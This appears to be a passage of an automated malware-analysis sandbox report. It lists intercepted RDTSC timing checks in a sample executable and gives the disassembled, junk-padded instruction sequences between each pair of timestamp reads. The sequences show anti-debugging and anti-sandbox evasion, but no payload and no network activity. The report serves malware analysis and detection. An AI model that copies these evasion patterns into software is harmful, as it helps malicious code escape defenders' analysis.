Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0439 second address: 53B0490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f pushad 0x00000010 jmp 00007F1CC8BB7C3Ch 0x00000015 mov bl, ah 0x00000017 popad 0x00000018 jne 00007F1D3A735E5Ah 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007F1CC8BB7C46h 0x00000026 pop esi 0x00000027 jmp 00007F1CC8BB7C3Bh 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0490 second address: 53B0496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0496 second address: 53B04C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1CC8BB7C45h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B04C2 second address: 53B054C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8B8C9F7h 0x00000009 xor si, 141Eh 0x0000000e jmp 00007F1CC8B8C9F9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F1CC8B8C9F0h 0x0000001a xor cl, 00000018h 0x0000001d jmp 00007F1CC8B8C9EBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 jne 00007F1D3A70AB68h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007F1CC8B8C9EBh 0x00000034 jmp 00007F1CC8B8C9F8h 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B054C second address: 53B0564 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test bl, 00000007h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0564 second address: 53B0568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0568 second address: 53B056C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B056C second address: 53B0572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0572 second address: 53B0578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0578 second address: 53B057C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B057C second address: 53B0580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A07C0 second address: 53A07F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1CC8B8C9F3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A07F5 second address: 53A07F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A07F9 second address: 53A07FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A07FF second address: 53A083E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8BB7C42h 0x00000009 and cx, CB98h 0x0000000e jmp 00007F1CC8BB7C3Bh 0x00000013 popfd 0x00000014 mov ch, 9Dh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F1CC8BB7C3Bh 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A083E second address: 53A0842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A0842 second address: 53A08D5 instructions: 0x00000000 rdtsc 0x00000002 call 00007F1CC8BB7C40h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a movsx edi, si 0x0000000d popad 0x0000000e and esp, FFFFFFF8h 0x00000011 pushad 0x00000012 mov di, ax 0x00000015 jmp 00007F1CC8BB7C44h 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F1CC8BB7C3Eh 0x00000023 xor esi, 41AB5AB8h 0x00000029 jmp 00007F1CC8BB7C3Bh 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F1CC8BB7C48h 0x00000035 xor si, 9518h 0x0000003a jmp 00007F1CC8BB7C3Bh 0x0000003f popfd 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F1CC8BB7C3Bh 0x0000004b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A08D5 second address: 53A08D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A08D9 second address: 53A08DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A08DF second address: 53A08FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A08FE second address: 53A0904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A0904 second address: 53A0913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9EBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A0913 second address: 53A0925 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bl, 3Dh 0x0000000e movzx ecx, bx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A0925 second address: 53A0978 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007F1CC8B8C9F9h 0x00000010 mov esi, dword ptr [ebp+08h] 0x00000013 jmp 00007F1CC8B8C9EEh 0x00000018 sub ebx, ebx 0x0000001a jmp 00007F1CC8B8C9F1h 0x0000001f test esi, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov bh, 54h 0x00000026 movzx ecx, di 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A0978 second address: 53A09C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F1D3A73D63Ah 0x0000000f jmp 00007F1CC8BB7C40h 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007F1CC8BB7C3Ch 0x00000024 sbb esi, 36C86DB8h 0x0000002a jmp 00007F1CC8BB7C3Bh 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A09C9 second address: 53A0A5A instructions: 0x00000000 rdtsc 0x00000002 mov ax, 31EFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushfd 0x0000000a jmp 00007F1CC8B8C9EBh 0x0000000f sbb ecx, 2D86777Eh 0x00000015 jmp 00007F1CC8B8C9F9h 0x0000001a popfd 0x0000001b pop eax 0x0000001c popad 0x0000001d mov ecx, esi 0x0000001f jmp 00007F1CC8B8C9F7h 0x00000024 je 00007F1D3A712370h 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F1CC8B8C9F4h 0x00000031 xor ecx, 1574ACD8h 0x00000037 jmp 00007F1CC8B8C9EBh 0x0000003c popfd 0x0000003d movzx eax, di 0x00000040 popad 0x00000041 test byte ptr [76FB6968h], 00000002h 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov si, E723h 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A0A5A second address: 53A0AC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F1D3A73D57Ah 0x0000000f jmp 00007F1CC8BB7C40h 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F1CC8BB7C3Eh 0x0000001e sub cl, FFFFFFC8h 0x00000021 jmp 00007F1CC8BB7C3Bh 0x00000026 popfd 0x00000027 mov esi, 28C4963Fh 0x0000002c popad 0x0000002d xchg eax, ebx 0x0000002e pushad 0x0000002f call 00007F1CC8BB7C40h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A0AC4 second address: 53A0AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 pop edi 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F1CC8B8C9F6h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A0AEB second address: 53A0AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A0AEF second address: 53A0B1E instructions: 0x00000000 rdtsc 0x00000002 call 00007F1CC8B8C9EAh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ax, dx 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1CC8B8C9F9h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A0B1E second address: 53A0B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A0BAF second address: 53A0BB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A0BB5 second address: 53A0C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8BB7C3Ch 0x00000009 add al, FFFFFFC8h 0x0000000c jmp 00007F1CC8BB7C3Bh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pop ebx 0x00000016 jmp 00007F1CC8BB7C45h 0x0000001b mov esp, ebp 0x0000001d jmp 00007F1CC8BB7C3Eh 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jmp 00007F1CC8BB7C3Dh 0x0000002b mov edx, esi 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C0008 second address: 53C000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C000C second address: 53C0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C0012 second address: 53C007C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F1CC8B8C9ECh 0x00000012 sub al, 00000068h 0x00000015 jmp 00007F1CC8B8C9EBh 0x0000001a popfd 0x0000001b call 00007F1CC8B8C9F8h 0x00000020 pop eax 0x00000021 popad 0x00000022 mov bh, C2h 0x00000024 popad 0x00000025 push eax 0x00000026 jmp 00007F1CC8B8C9EDh 0x0000002b xchg eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F1CC8B8C9EDh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C007C second address: 53C008C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C008C second address: 53C0090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C0090 second address: 53C00F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1CC8BB7C3Dh 0x00000011 adc si, 6546h 0x00000016 jmp 00007F1CC8BB7C41h 0x0000001b popfd 0x0000001c movzx esi, bx 0x0000001f popad 0x00000020 pop ebp 0x00000021 pushad 0x00000022 mov si, dx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushfd 0x00000028 jmp 00007F1CC8BB7C3Bh 0x0000002d add ah, 0000007Eh 0x00000030 jmp 00007F1CC8BB7C49h 0x00000035 popfd 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0D3F second address: 53B0DC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1CC8B8C9ECh 0x00000013 sbb eax, 5AF98988h 0x00000019 jmp 00007F1CC8B8C9EBh 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007F1CC8B8C9F5h 0x00000027 pop ebp 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F1CC8B8C9ECh 0x0000002f jmp 00007F1CC8B8C9F5h 0x00000034 popfd 0x00000035 call 00007F1CC8B8C9F0h 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5430B6B second address: 5430B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5430B6F second address: 5430B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5430B75 second address: 5430B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5430B7B second address: 5430C04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d movzx ecx, di 0x00000010 mov cx, dx 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 push eax 0x00000017 pushfd 0x00000018 jmp 00007F1CC8B8C9F1h 0x0000001d and esi, 79C2B686h 0x00000023 jmp 00007F1CC8B8C9F1h 0x00000028 popfd 0x00000029 pop esi 0x0000002a pushfd 0x0000002b jmp 00007F1CC8B8C9F1h 0x00000030 or ah, FFFFFFE6h 0x00000033 jmp 00007F1CC8B8C9F1h 0x00000038 popfd 0x00000039 popad 0x0000003a xchg eax, ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F1CC8B8C9EDh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5420EA3 second address: 5420EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5420EA7 second address: 5420EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5420EAB second address: 5420EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5420D2F second address: 5420D6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8B8C9F1h 0x00000009 add ax, B426h 0x0000000e jmp 00007F1CC8B8C9F1h 0x00000013 popfd 0x00000014 mov ax, 4957h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5420D6B second address: 5420D7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5420D7A second address: 5420D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5420D80 second address: 5420D8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5420D8F second address: 5420D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, 7DC5h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5420D98 second address: 5420D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5420D9E second address: 5420DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C03F8 second address: 53C03FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C03FE second address: 53C045B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1CC8B8C9EEh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov ecx, edx 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007F1CC8B8C9EFh 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F1CC8B8C9EBh 0x00000024 and ah, 0000006Eh 0x00000027 jmp 00007F1CC8B8C9F9h 0x0000002c popfd 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 54301F6 second address: 54301FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 54301FA second address: 5430217 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5430217 second address: 543021C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 543021C second address: 543023E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1CC8B8C9F5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 543023E second address: 543026D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1CC8BB7C3Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edx 0x00000015 pop eax 0x00000016 mov ax, bx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 543026D second address: 5430322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov cx, 481Dh 0x00000011 call 00007F1CC8B8C9EAh 0x00000016 pushfd 0x00000017 jmp 00007F1CC8B8C9F2h 0x0000001c sub esi, 3D0722A8h 0x00000022 jmp 00007F1CC8B8C9EBh 0x00000027 popfd 0x00000028 pop ecx 0x00000029 popad 0x0000002a push dword ptr [ebp+08h] 0x0000002d jmp 00007F1CC8B8C9EFh 0x00000032 call 00007F1CC8B8C9E9h 0x00000037 jmp 00007F1CC8B8C9F6h 0x0000003c push eax 0x0000003d pushad 0x0000003e mov ax, di 0x00000041 mov ax, dx 0x00000044 popad 0x00000045 mov eax, dword ptr [esp+04h] 0x00000049 jmp 00007F1CC8B8C9F6h 0x0000004e mov eax, dword ptr [eax] 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F1CC8B8C9EEh 0x00000057 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5430322 second address: 543033B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 543033B second address: 5430341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5430341 second address: 5430347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5430347 second address: 543034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 543034B second address: 5430364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1CC8BB7C3Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5430364 second address: 543036A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 543038E second address: 54303E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c jmp 00007F1CC8BB7C40h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 movsx edi, ax 0x00000018 pushfd 0x00000019 jmp 00007F1CC8BB7C46h 0x0000001e and ah, 00000078h 0x00000021 jmp 00007F1CC8BB7C3Bh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 54303E3 second address: 54303FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9F4h 0x00000009 rdtsc
